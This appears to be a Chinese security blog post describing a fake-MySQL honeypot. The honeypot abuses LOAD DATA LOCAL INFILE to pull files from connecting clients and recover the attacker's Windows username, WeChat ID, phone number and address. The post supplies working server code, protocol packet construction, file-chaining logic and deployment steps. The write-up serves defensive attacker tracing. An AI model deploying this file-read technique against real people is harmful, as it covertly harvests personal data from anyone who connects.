Obtain the attacker's mobile phone number and WeChat account through honeypot technology [Network Security]

Disclaimer: the following content is intended only for professional use such as red/blue team attack-and-defence exercises. Do not use it for illegal purposes.

First, a word on the concept of a honeypot. Put simply, a honeypot is a trap: we deliberately expose vulnerabilities that we designed ourselves so that attackers walk into it.

1. Introduction to honeypots

A honeypot is a deception technique for monitoring, detecting, analysing and tracing attacker behaviour. It serves no business purpose, so all traffic flowing into or out of it indicates scanning or attack activity, which lets defenders focus on attack traffic without the noise of legitimate users.

Honeypots actively trap attackers, record the attacker's actions in detail and collect large amounts of valuable data (virus or worm samples, the operator's commands, and so on), which provides rich material for attribution. A honeypot also burns the attacker's time, and can build a profile of the attacker through techniques such as JSONP-based fingerprinting of the attacker's browser.

Honeypots carry their own risk, however: if they are not properly isolated, they can become a new attack source, giving an attacker who compromises the honeypot a foothold from which to pivot into the real network.

2. Fake MySQL

Here I introduce the concept of Fake MySQL: a program that impersonates a MySQL server, lures the attacker into connecting, and then abuses the LOAD DATA LOCAL INFILE feature of the MySQL protocol to read files from the attacker's own computer. After the client sends a query, a MySQL server may answer with a request for a local file (a packet whose payload starts with the byte 0xFB followed by a path); a client with local infile enabled trusts the server and sends that file's contents. The files read this way yield the information described below.

3. Using honeypot technology to obtain the mobile phone number, WeChat ID and address

So how do we use this technique to obtain the attacker's mobile phone number and WeChat ID?

The normal acquisition approach

Let's first look at the normal way of reading the mobile phone number and WeChat ID. It takes three steps, each of which depends on the result of the previous one:

  • Get the Windows username from C:/Windows/PFRO.log
  • Get the wxid from C:/Users/username/Documents/WeChat Files/All Users/config/config.data
  • Get the address, WeChat ID and mobile phone number from C:/Users/username/Documents/WeChat Files/wx_id/config/AccInfo.dat

Get the Windows username

We test on our own computer here. Open C:/Windows/PFRO.log; the paths logged in it show that my username is 66396.

Get the wxid

Next, open C:/Users/66396/Documents/WeChat Files/All Users/config/config.data

The wxid can be read from this file.

Get the mobile phone number, WeChat ID and address

In AccInfo.dat the phone number is visible, along with the address and the WeChat ID.
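The three steps above are a chain: each file is requested at a path that depends on what was recovered from the previous one. The following is an added worked example of that chain, not the original author's code. The sample file contents are constructed for the demo and are not real dumps of PFRO.log, config.data or AccInfo.dat; the only assumption is that the real files contain the substrings the regexes look for (a `\Users\<name>\` path, a `WeChat Files\<wxid>\config` path, and an 11-digit mobile number). `fetch` stands in for the honeypot's file read and returns None when the client did not hand the file over, so a broken chain is visible rather than silently skipped.

```python
import re
from typing import Callable, Dict, List, Optional, Tuple

# Constructed sample contents (demo data, not real dumps). On disk config.data
# and AccInfo.dat are binary; only the embedded strings matter here.
SAMPLE_FILES: Dict[str, bytes] = {
    "C:/Windows/PFRO.log":
        b"02/24/2022 10:41:12 - PFRO Error: \\??\\C:\\Users\\66396\\AppData\\Local\\Temp\\x.tmp, |0x2\r\n",
    "C:/Users/66396/Documents/WeChat Files/All Users/config/config.data":
        b"\x00\x01C:\\Users\\66396\\Documents\\WeChat Files\\wxid_demo123\\config\\\x00",
    "C:/Users/66396/Documents/WeChat Files/wxid_demo123/config/AccInfo.dat":
        b"\x00\x0cwxid_demo123\x00\x12Guangdong Shenzhen\x00\x0b13800000000\x00",
}

# Request order; {username} and {wxid} are filled from the earlier files.
FILE_TEMPLATES: List[str] = [
    "C:/Windows/PFRO.log",
    "C:/Users/{username}/Documents/WeChat Files/All Users/config/config.data",
    "C:/Users/{username}/Documents/WeChat Files/{wxid}/config/AccInfo.dat",
]


def username_from_pfro(content: bytes) -> Optional[str]:
    """PFRO.log lists pending file renames with full paths; take the first \\Users\\<name>\\ component."""
    m = re.search(rb"\\Users\\([^\\\r\n]+)\\", content)
    return m.group(1).decode("utf-8", "ignore") if m else None


def wxid_from_config(content: bytes) -> Optional[str]:
    """config.data embeds a path ...\\WeChat Files\\<wxid>\\config\\... (assumed, per the page)."""
    m = re.search(rb"WeChat Files\\([^\\]+)\\config", content)
    return m.group(1).decode("utf-8", "ignore") if m else None


def phone_from_accinfo(content: bytes) -> Optional[str]:
    """The page takes the last 11-digit run; requiring the 1[3-9] mainland mobile
    prefix cuts false hits from other numeric runs inside binary data."""
    hits = re.findall(rb"1[3-9][0-9]{9}", content)
    return hits[-1].decode() if hits else None


def run_chain(fetch: Callable[[str], Optional[bytes]]) -> Tuple[Dict[str, Optional[str]], List[str]]:
    """Walk the three-file chain. fetch(path) returns the file bytes, or None when
    the read failed. Returns the recovered fields and every path requested, so a
    chain that stalls (e.g. the client refused the file) is visible."""
    state: Dict[str, Optional[str]] = {"username": None, "wxid": None, "phone": None}
    parsers = [("username", username_from_pfro),
               ("wxid", wxid_from_config),
               ("phone", phone_from_accinfo)]
    requested: List[str] = []
    for template, (key, parser) in zip(FILE_TEMPLATES, parsers):
        path = template.format(username=state["username"], wxid=state["wxid"])
        requested.append(path)
        content = fetch(path)
        if not content:
            break  # client did not send the file; later paths cannot be built
        value = parser(content)
        if value is None:
            break  # file arrived but did not contain what we need
        state[key] = value
    return state, requested


if __name__ == "__main__":
    recovered, paths = run_chain(SAMPLE_FILES.get)
    for p in paths:
        print("requested:", p)
    print(recovered)
```

Run against the constructed files the chain requests PFRO.log, then the config.data path built with the username, then the AccInfo.dat path built with the wxid, and returns all three fields; against a client that refuses every read it stops after the first request with nothing recovered.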

The above is the information an intruder can obtain by reading files on a compromised computer. So how do we design a honeypot such that the hacker throws himself into the net while attacking, and help the defender trace the attacker's identity?


4. The core code

How do we automate the above process? The core code below does two main things:

  1. Determine whether the connecting client is a scanner or a password-brute-forcing tool. If so, play along with its handshake and its fixed query sequence; the net effect is that the scanner reports a weak 3306 password, which is exactly the bait.
  2. If it is a direct (interactive) connection, request the configured file from the client and write it to local storage.
import os
import random


def mysql_get_file_content(filename, conn, address):
    """Talk to a freshly accepted client and try to pull `filename` from it.

    The b"xx" / b"xxx" literals are the MySQL protocol packets (server greeting,
    OK packet, result sets) that the original article elides; the real project
    fills them in. Returns (True, content) on success, (False, content) otherwise.
    """
    logpath = os.path.abspath('.') + "/log/" + address[0]
    if not os.path.exists(logpath):
        os.makedirs(logpath)
    conn.sendall(b"xxx")  # server greeting (handshake packet)
    try:
        conn.recv(1024000)  # client's handshake response (login attempt)
    except Exception as e:
        print(e)
    try:
        conn.sendall(b"xx")  # OK packet: accept whatever credentials were sent
        res1 = conn.recv(1024000)  # first query from the client
        # Scanners and brute-force tools run a fixed query sequence after login;
        # answer each query in turn, then drop the connection without asking
        # for any file.
        if b'SHOW VARIABLES' in res1:
            conn.sendall(b"xxx")
            res2 = conn.recv(9999)
            if b'SHOW WARNINGS' in res2:
                conn.sendall(b"xxx")
                res3 = conn.recv(9999)
                if b'SHOW COLLATION' in res3:
                    conn.sendall(b"xxx")
                    res4 = conn.recv(9999)
                    if b'SET NAMES utf8' in res4:
                        conn.sendall(b"xxx")
                        res5 = conn.recv(9999)
                        if b'SET character_set_results=NULL' in res5:
                            conn.sendall(b"xxx")
                    conn.close()
                else:
                    conn.close()
            else:
                conn.close()
        else:
            # Interactive client (e.g. Navicat): answer its query with a
            # LOAD DATA LOCAL INFILE request. Packet = 3-byte length,
            # 1-byte sequence id (1), then 0xFB + filename. A client with
            # local infile enabled replies with the file's contents.
            try:
                wantfile = bytes([len(filename) + 1]) + b"\x00\x00\x01\xFB" + filename.encode()
                conn.sendall(wantfile)
                content = b''
                while True:
                    data = conn.recv(1024)
                    print(len(data))
                    content += data
                    if len(data) < 1024:  # short read taken as end of file
                        print('ok')
                        break
                conn.close()
                item = (logpath + "/" + filename.replace("/", "_").replace(":", "")
                        + '_' + str(random.random()))
                if len(content) > 6:
                    with open(item, "wb") as f:
                        f.write(content)
                    return (True, content)
                else:
                    return (False, content)
            except Exception as e:
                print(e)
    except Exception as e:
        print(e)
    return (False, b'')

The receive loop inside mysql_get_file_content keeps reading until a short recv() arrives, so that a file larger than one read is not truncated. Note that a short TCP read does not guarantee end of file; a stricter approach is to parse the MySQL packet framing and stop at the empty terminator packet the client sends after the last chunk. The accept loop below drives the three reads in order, substituting the username and wxid recovered from the earlier files into the later paths:

import datetime
import os
import re

import qrcode

# The three target files, reconstructed from the paths in section 3. The
# 'Administrator' and 'wx_id' placeholders are replaced once the earlier files
# have been read. sv (listening socket), db/cursor (database handle),
# get_username() and insert_file() are defined elsewhere in the project and are
# not shown on the page.
files = [
    'C:/Windows/PFRO.log',
    'C:/Users/Administrator/Documents/WeChat Files/All Users/config/config.data',
    'C:/Users/Administrator/Documents/WeChat Files/wx_id/config/AccInfo.dat',
]
files1 = list(files)
username = 'Administrator'
wx_id = 'wx_id'

while True:
    conn, address = sv.accept()
    first_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
    file = files1[0].replace('Administrator', username).replace('wx_id', wx_id)
    res, content = mysql_get_file_content(file, conn, address)
    files1.append(files1.pop(0))  # rotate: the next connection asks for the next file
    if res:
        # config.data and AccInfo.dat are binary; decode loosely before the regexes.
        text = content.decode('utf-8', 'ignore')
        if 'PFRO' in file:
            username = get_username(text)
            # The SQL statements are elided ("xx") in the original. When filling
            # them in, pass attacker-derived values as query parameters
            # (cursor.execute(sql, params)) rather than "%" formatting: the file
            # contents are attacker-controlled and would otherwise give the
            # attacker SQL injection into the honeypot's own database.
            s = "xx"
            cursor.execute(s)
            data = cursor.fetchall()
            if len(data) == 0:
                s = "XX"
                cursor.execute(s)
                db.commit()
                print('success:' + file)
                insert_file(file, address, username)
        elif 'config.data' in file:
            # backslashes restored; the page's copy of this regex lost them
            wxid = re.findall(r'WeChat Files\\(.*?)\\config', text)[0]
            sql = "xxx"
            cursor.execute(sql)
            db.commit()
            wx_id = wxid
            # QR code that opens the attacker's WeChat profile when scanned
            img = qrcode.make('weixin://contacts/profile/' + wxid)
            img.save(os.path.abspath('.') + '/static/pic/' + wxid + '.png')
            print('success:' + file)
            insert_file(file, address, username)
        elif 'AccInfo' in file:
            phone = re.findall(r'[0-9]{11}', text)[-1]
            sql = "xxx"
            cursor.execute(sql)
            db.commit()
            print('success:' + file)
            insert_file(file, address, username)
    else:
        # read failed: restart the chain from PFRO.log on the next connection
        files1 = list(files)
        username = 'Administrator'
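To make concrete what the elided "xxx" packets in the core code have to contain, here is an added, self-contained model of the MySQL wire exchange that the honeypot relies on. It is not code from the original post or from the project: it implements the packet framing, a HandshakeV10 greeting that advertises CLIENT_LOCAL_FILES, the 0xFB request that the core code builds by hand, and the client's reply (file chunks followed by an empty packet). The client side is a constructed stand-in so the exchange runs offline; a real client would also send a handshake response and a COM_QUERY, which are only modelled here as far as reading the capability flags. Field layouts follow the public MySQL client/server protocol documentation; the server version string and salt are arbitrary demo values.

```python
import struct

# Capability flags from the MySQL client/server protocol (subset).
CLIENT_LONG_PASSWORD = 0x00000001
CLIENT_LOCAL_FILES = 0x00000080       # client is willing to send local files
CLIENT_PROTOCOL_41 = 0x00000200
CLIENT_SECURE_CONNECTION = 0x00008000
CLIENT_PLUGIN_AUTH = 0x00080000

CHUNK = 1024  # chunk size for the simulated client (real clients use larger packets)


def pack_packet(seq, payload):
    """MySQL wire framing: 3-byte little-endian length, 1-byte sequence id, payload."""
    return len(payload).to_bytes(3, "little") + bytes([seq & 0xFF]) + payload


def unpack_packets(buf):
    """Split a buffer into (seq, payload) tuples; a truncated packet is an error."""
    out, off = [], 0
    while off < len(buf):
        if off + 4 > len(buf):
            raise ValueError("truncated packet header")
        length = int.from_bytes(buf[off:off + 3], "little")
        payload = buf[off + 4:off + 4 + length]
        if len(payload) != length:
            raise ValueError("truncated packet payload")
        out.append((buf[off + 3], payload))
        off += 4 + length
    return out


def server_greeting(salt=b"A" * 20, version=b"5.7.33-fake"):
    """Protocol::HandshakeV10 (sequence 0) that advertises CLIENT_LOCAL_FILES."""
    caps = (CLIENT_LONG_PASSWORD | CLIENT_LOCAL_FILES | CLIENT_PROTOCOL_41
            | CLIENT_SECURE_CONNECTION | CLIENT_PLUGIN_AUTH)
    payload = (b"\x0a" + version + b"\x00"        # protocol 10, server version
               + struct.pack("<I", 1)              # connection id
               + salt[:8] + b"\x00"                # auth data part 1, filler
               + struct.pack("<H", caps & 0xFFFF)  # capability flags, low half
               + b"\x21"                           # charset utf8_general_ci
               + struct.pack("<H", 0x0002)         # status: SERVER_STATUS_AUTOCOMMIT
               + struct.pack("<H", caps >> 16)     # capability flags, high half
               + bytes([len(salt) + 1])            # auth data length
               + b"\x00" * 10                      # reserved
               + salt[8:] + b"\x00"                # auth data part 2 (13 bytes)
               + b"mysql_native_password\x00")     # auth plugin name
    return pack_packet(0, payload)


def ok_packet(seq):
    """OK_Packet: 0 affected rows, 0 insert id, autocommit status, 0 warnings."""
    return pack_packet(seq, b"\x00\x00\x00\x02\x00\x00\x00")


def client_capabilities(handshake_response_payload):
    """HandshakeResponse41 starts with the client's 4-byte capability flags."""
    return struct.unpack("<I", handshake_response_payload[:4])[0]


def local_infile_request(seq, filename):
    """Server reply to COM_QUERY asking the client for a local file: 0xFB + name."""
    return pack_packet(seq, b"\xfb" + filename.encode("utf-8"))


def collect_infile(packets):
    """The client streams the file, then sends an empty packet. Returns b"" when
    the client could not open the file (it then sends only the terminator)."""
    content = b""
    for _, payload in packets:
        if payload == b"":
            return content
        content += payload
    raise ValueError("client did not terminate the file transfer")


def simulated_client(files, request_bytes):
    """Stand-in for a client with local infile enabled (constructed for this demo)."""
    (seq, payload), = unpack_packets(request_bytes)
    if payload[:1] != b"\xfb":
        raise ValueError("not a LOCAL INFILE request")
    data = files.get(payload[1:].decode("utf-8"), b"")
    out, seq = b"", seq + 1
    for i in range(0, len(data), CHUNK):
        out += pack_packet(seq, data[i:i + CHUNK])
        seq += 1
    return out + pack_packet(seq, b"")  # terminator, sent even if the file is missing


def honeypot_read(files, filename):
    """One round: the server's 0xFB request (seq 1, following the client's COM_QUERY
    at seq 0), the client's file packets, then the server's OK. Returns the content."""
    request = local_infile_request(1, filename)
    packets = unpack_packets(simulated_client(files, request))
    content = collect_infile(packets)
    _ = ok_packet(packets[-1][0] + 1)  # what the server sends back to finish the query
    return content


if __name__ == "__main__":
    demo = {"C:/Windows/PFRO.log": b"line\r\n" * 300}  # constructed sample file
    print(len(honeypot_read(demo, "C:/Windows/PFRO.log")), "bytes recovered")
    print("missing file ->", honeypot_read(demo, "C:/nope"))
```

Two things worth checking in the model: `local_infile_request(1, "C:/Windows/PFRO.log")` produces exactly the bytes the core code assembles by hand (length 0x14, sequence 0x01, 0xFB, path), and `client_capabilities` on the client's handshake response tells the honeypot in advance whether CLIENT_LOCAL_FILES is set, so a connection from a client that will refuse the request can be logged as such instead of waiting on a read that returns only the empty terminator.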

Deployment method

First download the tool and upload it to the server.

Then edit webServer.py and change the admin password. You can also change the username, according to personal preference.

Then start the service with Docker by running the project:

docker-compose up -d

Usage

Attackers usually start by looking for vulnerabilities in our website. Here we use the honeypot to deliberately expose our database and give it a weak password so that the attacker can connect.

Once the attacker connects to our database with Navicat, the honeypot's code runs and reads their mobile phone number, WeChat ID and address. Note that the read only succeeds if the attacker's client has local infile enabled: the workflow on this page relies on Navicat doing so, whereas the mysql command-line client has had LOAD DATA LOCAL disabled by default since 8.0, so a careful attacker may leak nothing.

The admin dashboard listens on port 5000; log in with the admin username and the password set in webServer.py (fancypig in the example).

Then you can see the attacker's information.

Origin blog.csdn.net/HBohan/article/details/123277944